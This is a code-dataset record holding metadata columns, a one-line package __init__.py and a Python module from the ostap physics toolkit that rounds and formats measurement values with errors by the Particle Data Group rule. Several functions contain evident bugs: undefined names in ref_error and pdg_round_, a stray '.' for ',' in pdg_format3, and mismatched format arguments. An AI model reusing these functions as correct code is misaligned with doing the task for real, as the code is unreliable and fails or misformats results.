| 31.25 | 59 | 0.72 | 22 | 125 | 3.954545 | 0.636364 | 0.298851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.168 | 125 | 3 | 60 | 41.666667 | 0.826923 | 0.136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
f766c70844a73ac671536d8a2ee5ca6dacc57ce6 | 43 | py | Python | solarbextrapolation/data/__init__.py | sunpy/solarbextrapolation | e064466df118cd72239ec3bcdc60ba42b40f1abb | [
"MIT"
] | 13 | 2015-09-29T12:46:58.000Z | 2021-09-24T06:13:27.000Z | solarbextrapolation/data/__init__.py | dstansby/solarbextrapolation | ec77ffe42978acd4d77f51ddfce5750c7e4cffac | [
"MIT",
"BSD-3-Clause"
] | 24 | 2015-06-24T13:45:44.000Z | 2020-02-15T00:06:38.000Z | solarbextrapolation/data/__init__.py | dstansby/solarbextrapolation | ec77ffe42978acd4d77f51ddfce5750c7e4cffac | [
"MIT",
"BSD-3-Clause"
] | 9 | 2015-06-04T16:35:43.000Z | 2019-05-01T20:39:05.000Z | from ._sample import download_sample_data
| 14.333333 | 41 | 0.860465 | 6 | 43 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 2 | 42 | 21.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e3b7bfbec9d8e13180ac93a2187fa86cf6510292 | 35,075 | py | Python | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 14 | 2017-03-24T12:38:08.000Z | 2022-02-21T05:00:57.000Z | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 10 | 2019-03-08T18:48:42.000Z | 2022-03-22T11:59:48.000Z | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 11 | 2017-03-23T15:29:58.000Z | 2022-02-21T05:03:57.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# @file
# Set of utilities for rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
# Quote:
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
#
# =============================================================================
""" Set of utilities for rounding according to PDG prescription
see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
| The basic rule states that if the three highest order digits of the error
| lie between 100 and 354, we round to two significant digits. If they lie between
| 355 and 949, we round to one significant digit. Finally,
| if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
| In all cases, the central value is given with a precision that matches that of the error.
"""
# =============================================================================
__author__ = "Vanya BELYAEV Ivan.Belyaev@itep.ru"
__date__ = "2015-07-15"
__version__ = "$Revision$"
__all__ = (
'frexp10' , ## similar to math.frexp but with radix=10
'round_N' , ## round floating value to N-significant digits
'pdg_round' , ## round value,error-pair according to PDG prescription
'pdg_format' , ## format value&error according to PDF prescription
'pdg_format2' , ## format value+2errors according to PDG
'pdg_format3' , ## format value+3errors according to PDG
)
# ===============================================================================
import ROOT, math, sys, enum
from ostap.math.ve import VE
from ostap.math.base import frexp10, isfinite, isclose
from ostap.core.ostap_types import integer_types
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
if '__main__' == __name__ : logger = getLogger ( 'ostap.utils.pdg_format' )
else : logger = getLogger ( __name__ )
# =============================================================================
class ErrMode(enum.IntEnum):
TOTAL = 0 ## Use total uncertainty
MIN = 1 ## Use minimal uncertainty
MAX = 2 ## Use maximal uncertainty
MEAN = 3 ## Use mean
AVERAGE = 3 ## Use mean
GEOMETRIC = 4 ## Use geometric mean
# =============================================================================
## get the reference error from the list of uncertainties
# @code
# error = ref_error ( 'total' , 0.1 , 0.2 , 0.3 )
# error = ref_error ( Mode.MIN , 0.1 , 0.2 , 0.3 )
# @endcode
def ref_error ( mode , error , *errors ) :
"""Get the reference error from the list of uncertainties
>>> error = ref_error ( 'total' , 0.1 , 0.2 , 0.3 )
>>> error = ref_error ( Mode.MIN , 0.1 , 0.2 , 0.3 )
"""
if not errors : return abs ( error )
umode = mode
if isinstance ( mode , string_types ) :
umode = model.upper()
if umode : umode = ErrMode.TOTAL .name
elif umode in ( 'MIMIMAL' , 'MINIMUM' , 'MN' ) : umode = ErrMode.MIN .name
elif umode in ( 'MAXIMAL' , 'MAXIMUM' , 'MX' ) : umode = ErrMode.MAX .name
elif umode in ( 'A' , 'AV', 'AVE' ) : umode = ErrMode.AVERAGE.name
assert umode in ErrMode.__members__ ,\
'ref_error: Unknown string mode: %s' % mode
umode = ErrMode[umode]
elif isinstance ( mode , integer_types ) :
for k,v in ErrMode.__members__.items() :
if v == mode :
umode = v
break
else :
raise ValueError("ref_error: Unknown integer mode %s" % mode )
assert isinstance ( umode , Mode ),\
'ref_error: Unknown mode %s' % umode
if umode == ErrMode.TOTAL :
result = error * error
for e in errors : result += e*e
return math.sqrt ( result )
elif umode == ErrMode.MIN :
result = abs ( erorr )
for e in errors : result = min ( result , abs ( e ) )
return result
elif umode == ErrMode.MAX :
result = abs ( erorr )
for e in errors : result = max ( result , abs ( e ) )
return result
elif umode == ErrMode.GEOMETRIC :
result = abs ( erorr )
ne = 1
for e in errors :
ae = abs ( e )
if 0 < ae :
result *= ae
ne += 1
return result if 0 == result else pow ( result , 1.0 / ne )
else :
result = abs ( erorr )
ne = 1
for e in errors :
result += ae
ne += 1
return result / float ( ne )
# =============================================================================
## round to nearest integer, rounds half integers to nearest even integer
# It is just a simple wrapper around boost::numeric::converter
# @see Ostap::Math::round
## cpp_round = Ostap.Math.round
## cpp_round_N = Ostap.Math.round_N
## ============================================================================
# round value to N-digits
# @code
# new_value = round_N ( value , 3 )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def round_N ( value , n ) :
"""Round value to to N-digits
>>> new_value = round_N ( value , 3 )
"""
assert isinstance ( n , integer_types ) and 0 <= n,\
"round_N: invalid ``n'' %s (must be non-negative integer)" % n
## return cpp_round_N ( value , n )
v = float ( value )
if 0 == v : return 0
a , b = frexp10 ( v )
e = b - 1
m = a * 10
ni = n - 1
f1 = 10 ** ni
f2 = 1
if ni < e : f2 = ( 10 ** ( e - ni ) )
elif ni > e : f2 = 1.0/( 10 ** ( ni - e ) )
return round ( m * f1 ) * float ( f2 )
# =============================================================================
## get ``mantissa'' (1<=m<10) and exponent for radix10
# similar for frexp, but use radix=10
# @code
# m,e = _frexp10_ ( value )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _frexp10_ ( value ) :
"""Get ``mantissa'' (1<=m<10) and exponent for radix10
similar for frexp, but use radix=10
>>> m , e = _frexp10_ ( value )
"""
m , e = frexp10 ( value )
return m * 10 , e-1
# =============================================================================
## get three significant digits from the floating value
# @code
# nums = three_digits ( value )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def three_digits ( value ) :
"""Get three first significant digits
>>> nums = three_digits ( value )
"""
#
if not 0.1<= abs ( value ) < 1 : value = frexp10 ( float ( value ) ) [0]
#
return int ( round ( float ( value ) * 1000 , 0 ) )
# ==============================================================================
# Classify according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# Cases:
# - -2, error is NaN
# - -1, error is Inf
# - 0, error is zero
# - 1, the first regular case
# - 2, the second regular case
# - 3, the third regular case
# @code
# case , rounded_error = pdg_case ( error )
# @endcode
def pdg_case ( error ) :
"""Classify according to PDG prescription
- see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
- see section 5.3 of doi:10.1088/0954-3899/33/1/001
The basic rule states that
- if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
- If they lie between 355 and 949, we round to one significant digit.
- Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
Cases:
- -2, error is NaN
- -1, error is Inf
- 0, error is zero
- 1, the first regular case
- 2, the second regular case
- 3, the third regular case
>>> error = ...
>>> case , rounded_error = pdg_case ( error )
"""
if math.isnan ( error ) : return -2 , error
elif math.isinf ( error ) : return -1 , error
ne = abs ( three_digits ( error ) )
if 0 == ne : return 0 , 0
elif ne <= 354 : return 1 , round_N ( error , 2 )
elif ne <= 949 : return 2 , round_N ( error , 1 )
else : return 3 , round_N ( error , 1 )
# ==============================================================================
# make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val, err , exponnet, err_case = pdg_round__ ( value , error )
# print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round__ ( value , error ) :
"""Make a rounding according to PDG prescription
- see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
- see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that if the three highest order digits of the error
lie between 100 and 354, we round to two significant digits. If they lie between
355 and 949, we round to one significant digit. Finally,
if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> val , err , exponent , err_case = pdg_round__ ( value , error )
>>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
"""
ecase , err = pdg_case ( error )
assert -2 <= ecase <= 3 ,\
'pdg_round: invalid error case %s/%s' % ( ecase , error )
## irregular casses :
if ecase <= 0 or not isfinite ( value ) :
return value , error , 0 , ecase
## regular error
ee , be = _frexp10_ ( error )
if 1 == ecase : q = be + 1 - 2
elif 2 == ecase : q = be + 1 - 1
elif 3 == ecase : q = be + 1 - 2
r = 10 ** q
val = round ( float ( value ) / r ) * r * 1.0
return val , err , q , ecase
# ===============================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val , err , exponent = pdg_round_ ( value , error )
# print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round_ ( value , error ) :
"""Make a rounding according to PDG prescription
- see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
- see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that if the three highest order digits of the error
lie between 100 and 354, we round to two significant digits. If they lie between
355 and 949, we round to one significant digit. Finally,
if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> val, err, exponent = pdg_round_ ( value , error )
>>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
"""
##
val, err , q , c = pdg_round__ ( value , error )
##
return v , e , q
# =============================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val , err = pdg_round ( value , error )
# print( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round ( value , error ) :
"""Make a rounding according to PDG prescription
- see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
- see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that
- if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
- If they lie between 355 and 949, we round to one significant digit.
- Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> val, err = pdg_round ( value , error )
>>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
"""
##
val , err , f = pdg_round_ ( value , error )
##
return val , err
# =============================================================================
## Round value/error accoriding to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ' Rounded value/error is %s ' % pdg_format ( value , error , True )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format ( value , error , latex = False ) :
"""Round value/error accoridng to PDG prescription and format it for print
- see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
- see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that
- if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
- If they lie between 355 and 949, we round to one significant digit.
- Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> value, error = ...
>>> print ' Rounded value/error is %s ' % pdg_format ( value , error , True )
"""
val , err , q , ecase = pdg_round__ ( value , error )
if ecase <= 0 :
if not isfinite ( val ) :
return ( '%+g \\pm %-g ' % ( val , err ) ) if latex else ( '% +g +/- %-g ' % ( val , err ) )
else :
qv , bv = _frexp10_ ( val )
if 0 != bv :
if latex : return '(%+.2f \\pm %-s)\\times 10^{%d}' % ( qv , err / 10**bv , bv )
else : return ' %+.2f +/- %-s)*10^{%d} ' % ( qv , err / 10**bv , bv )
else :
if latex : return ' %+.2f \\pm %-s ' % ( qv , err )
else : return ' %+.2f +/- %-s ' % ( qv , err )
qe , be = _frexp10_ ( error )
a , b = divmod ( be , 3 )
if 1 == ecase :
if 0 == b :
nd = 1
elif 1 == b :
nd = 3
a += 1
elif 2 == b :
a += 1
nd = 2
elif 2 == ecase :
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
elif 3 == ecase :
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
if 0 == a :
if latex: fmt = '(%%+.%df \\pm %%.%df)' % ( nd , nd )
else : fmt = ' %%+.%df +/- %%.%df ' % ( nd , nd )
return fmt % ( val , err )
if latex: fmt = '(%%+.%df \\pm %%.%df)\\times 10^{%%d}' % ( nd , nd )
else : fmt = '(%%+.%df +/- %%.%df)*10^{%%d}' % ( nd , nd )
scale = 1.0/10**(3*a)
return fmt % ( val * scale , err * scale , 3 * a )
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ' Rounded value/error is %s ' % pdg_format2 ( value , error , error2 , True )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format2( value , error1 , error2 , latex = False , mode = ErrMode.TOTAL ) :
"""Round value/error accoridng to PDG prescription and format it for print
@see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
@see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that
- if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
- If they lie between 355 and 949, we round to one significant digit.
- Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> value, error1, error2 = ...
>>> print ' Rounded value/error is %s ' % pdg_format2 ( value , error1 , error2 , True )
"""
error = ref_error ( mode , error1 , error2 )
val , err , q , ecase = pdg_round__ ( value , error )
if ecase <= 0 or ( not isfinite ( error1 ) ) or ( not isfinite ( error2 ) ) :
if not isfinite ( val ) :
return ( '%+g \\pm %-g \\pm %-g ' % ( val , error1 , error2 ) ) if latex else \
( '%+g +/- %-g +/- %-g' % ( val , error1 , error2 ) )
else :
qv , bv = _frexp10_ ( val )
if 0 != bv :
scale = 1.0 / 10**bv
if latex : return '(%+.2f \\pm %-s \\pm %-s)\\times 10^{%d}' % ( qv , error1 * scale , error2 * scale , bv )
else : return ' %+.2f +/- %-s +/ %-s)*10^{%d} ' % ( qv , error1 * scale , error2 * scale , bv )
else :
if latex : return ' %+.2f \\pm %-s \\pm %-s ' % ( qv , error1 , error2 )
else : return ' %+.2f +/- %-s +/- %-s ' % ( qv , error1 , error2 )
qe , be = _frexp10_ ( error )
a , b = divmod ( be , 3 )
if 1 == ecase :
err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
if 0 == b :
nd = 1
elif 1 == b :
nd = 3
a += 1
elif 2 == b :
a += 1
nd = 2
elif 2 == ecase :
err1 = round_N ( error1 , 1 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 1 ) if isclose ( error2 , error , 1.e-2 ) else err
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
elif 3 == ecase :
err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
if 0 == a :
if latex: fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df )' % ( nd , nd , nd )
else : fmt = ' %%+.%df +/- %%.%df +/- %%.%df ' % ( nd , nd , nd )
return fmt % ( val , err )
if latex: fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df )\\times 10^{%%d}' % ( nd , nd , nd )
else : fmt = '(%%+.%df +/- %%.%df +/- %%.%df)*10^{%%d}' % ( nd , nd , nd )
scale = 1.0/10**(3*a)
return fmt % ( val * scale , err1 * scale , err2 * scale , 3 * a )
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ' Rounded value/error is %s ' % pdg_format2 ( value , error , error2 , True )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format3( value , error1 , error2 , error3 , latex = False , mode = 'total' ) :
"""Round value/error accoridng to PDG prescription and format it for print
@see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
@see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that
- if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
- If they lie between 355 and 949, we round to one significant digit.
- Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> value, error1, error2 = ...
>>> print ' Rounded value/error is %s ' % pdg_format2 ( value , error1 , error2 , True )
"""
error = ref_error ( mode , error1 , error2 , error3 )
val , err , q , ecase = pdg_round__ ( value , error )
if ecase <= 0 or ( not isfinite ( error1 ) ) or ( not isfinite ( error2 ) ) or ( not isfinite ( error3 ) ) :
if not isfinite ( val ) :
return ( '%+g \\pm %-g \\pm %-g \\pm %-g ' % ( val , error1 , error2 , error3 ) ) if latex else \
( '%+g +/- %-g +/- %-g +/- %-g' % ( val , error1 , error2 , error3 ) )
else :
qv , bv = _frexp10_ ( val )
if 0 != bv :
scale = 1.0 / 10**bv
if latex : return '(%+.2f \\pm %-s \\pm %-s)\\times 10^{%d}' % ( qv , error1 * scale , error2 * scale , error3 * scale , bv )
else : return ' %+.2f +/- %-s +/ %-s +/- %-s )*10^{%d} ' % ( qv , error1 * scale , error2 * scale , error3 * scale , bv )
else :
if latex : return ' %+.2f \\pm %-s \\pm %-s \\pm %-s ' % ( qv , error1 , error2 , error3 )
else : return ' %+.2f +/- %-s +/- %-s +/- %-s ' % ( qv , error1 , error2 , error3 )
qe , be = _frexp10_ ( error )
a , b = divmod ( be , 3 )
if 1 == ecase :
err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
err3 = round_N ( error3 , 2 ) if isclose ( error3 , error , 1.e-2 ) else err
if 0 == b :
nd = 1
elif 1 == b :
nd = 3
a += 1
elif 2 == b :
a += 1
nd = 2
elif 2 == ecase :
err1 = round_N ( error1 , 1 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 1 ) if isclose ( error2 , error , 1.e-2 ) else err
err3 = round_N ( error3 , 1 ) if isclose ( error3 , error , 1.e-2 ) else err
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
elif 3 == ecase :
err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
err3 = round_N ( error3 , 2 ) if isclose ( error3 , error , 1.e-2 ) else err
if 0 == b :
nd = 0
if 2 == a % 3 :
nd = 3
a = a + 1
elif 1 == b :
nd = 2
a += 1
elif 2 == b :
nd = 1
a += 1
if 0 == a :
if latex: fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df \\pm %%.%df)' % ( nd , nd , nd , nd )
else : fmt = ' %%+.%df +/- %%.%df +/- %%.%df +/- %%.%df ' % ( nd , nd , nd . nd )
return fmt % ( val , err )
if latex: fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df \\pm %%.%df)\\times 10^{%%d}' % ( nd , nd , nd , nd )
else : fmt = '(%%+.%df +/- %%.%df +/- %%.%df +/- %%.%df)*10^{%%d}' % ( nd , nd , nd , nd )
scale = 1.0/10**(3*a)
return fmt % ( val * scale , err1 * scale , err2 * scale , err3 * scale , 3 * a )
# ====================================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# ve = VE( ...
# vr = ve.pdg()
# print ' Rounded value with error is %s ' % vr
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _ve_pdg_ ( ve ) :
"""Make a rounding according to PDG prescription
@see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
@see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that if the three highest order digits of the error
lie between 100 and 354, we round to two significant digits. If they lie between
355 and 949, we round to one significant digit. Finally,
if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> ve = VE( ...
>>> vr = ve.pdg()
>>> print ' Rounded value with error is %s ' % vr
"""
#
v , e = pdg_round ( ve.value() , ve.error() )
#
return VE ( v , e * e )
# =============================================================================
## Round value/error accoridng to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# ve = VE( ... )
# print ' Rounded value/error is %s ' % ve.pdg_format ()
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _ve_pdg_format_ ( ve , latex = False ) :
"""Round value/error accoridng to PDG prescription and format it for print
@see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
@see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
The basic rule states that if the three highest order digits of the error
lie between 100 and 354, we round to two significant digits. If they lie between
355 and 949, we round to one significant digit. Finally,
if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
In all cases, the central value is given with a precision that matches that of the error.
>>> ve = VE(... )
>>> print ' Rounded value/error is %s ' % ve.pdg_format ()
"""
return pdg_format ( ve.value() , ve.error() , latex )
# =============================================================================
## finally decorate class ValueWith Error
# =============================================================================
VE.pdg = _ve_pdg_
VE.pdg_format = _ve_pdg_format_
# =============================================================================
## insert it to math
if not hasattr ( math , 'frexp10' ) : math.frexp10 = frexp10
if not hasattr ( math , 'round_N' ) : math.round_N = round_N
# =============================================================================
if '__main__' == __name__ :
from ostap.utils.docme import docme
docme ( __name__ , logger = logger )
N = 37
rows = [ ( 'n1' , 'n2' , 'n3' , 'n4' , 'n5' ) ]
for i in range ( 1 , N ) :
v = float(i)/N
v1 = VE ( v , 0.01 * v*v )
v2 = VE ( v , 0.01 * v*v/100 )
v3 = VE ( v , 0.01 * v*v/10000 )
v4 = VE ( v , 0.01 * v*v/1000000 )
v5 = VE ( v , 0.01 * v*v/100000000 )
v6 = VE ( v , 0.01 * v*v/10000000000 )
v7 = VE ( math.inf , 0.01 * v*v/10000000000 )
v8 = VE ( v , math.nan )
for e in [ -100 , -50 , -10 ] + [ g for g in range ( -5 , 6 ) ] + [ 10 , 50 , 100 ] :
w1 = v1 * 10 ** e
w2 = v2 * 10 ** e
w3 = v3 * 10 ** e
w4 = v4 * 10 ** e
w5 = v5 * 10 ** e
w6 = v6 * 10 ** e
w7 = v7 * 10 ** e
w8 = v8 * 10 ** e
row = ( pdg_format ( w1.value() , w1.error() ) ,
pdg_format ( w2.value() , w2.error() ) ,
pdg_format ( w3.value() , w3.error() ) ,
pdg_format ( w4.value() , w4.error() ) ,
pdg_format ( w5.value() , w5.error() ) ,
pdg_format ( w6.value() , w6.error() ) ,
pdg_format ( w7.value() , w7.error() ) ,
pdg_format ( w8.value() , w8.error() ) )
rows.append ( row )
import ostap.logger.table as T
logger.info ( 'PDG roundings:\n%s ' % T.table ( rows , prefix = '# ' , alignment = 'ccccc' ) )
logger.info ( 80*'*' )
# =============================================================================
## The END
# =============================================================================
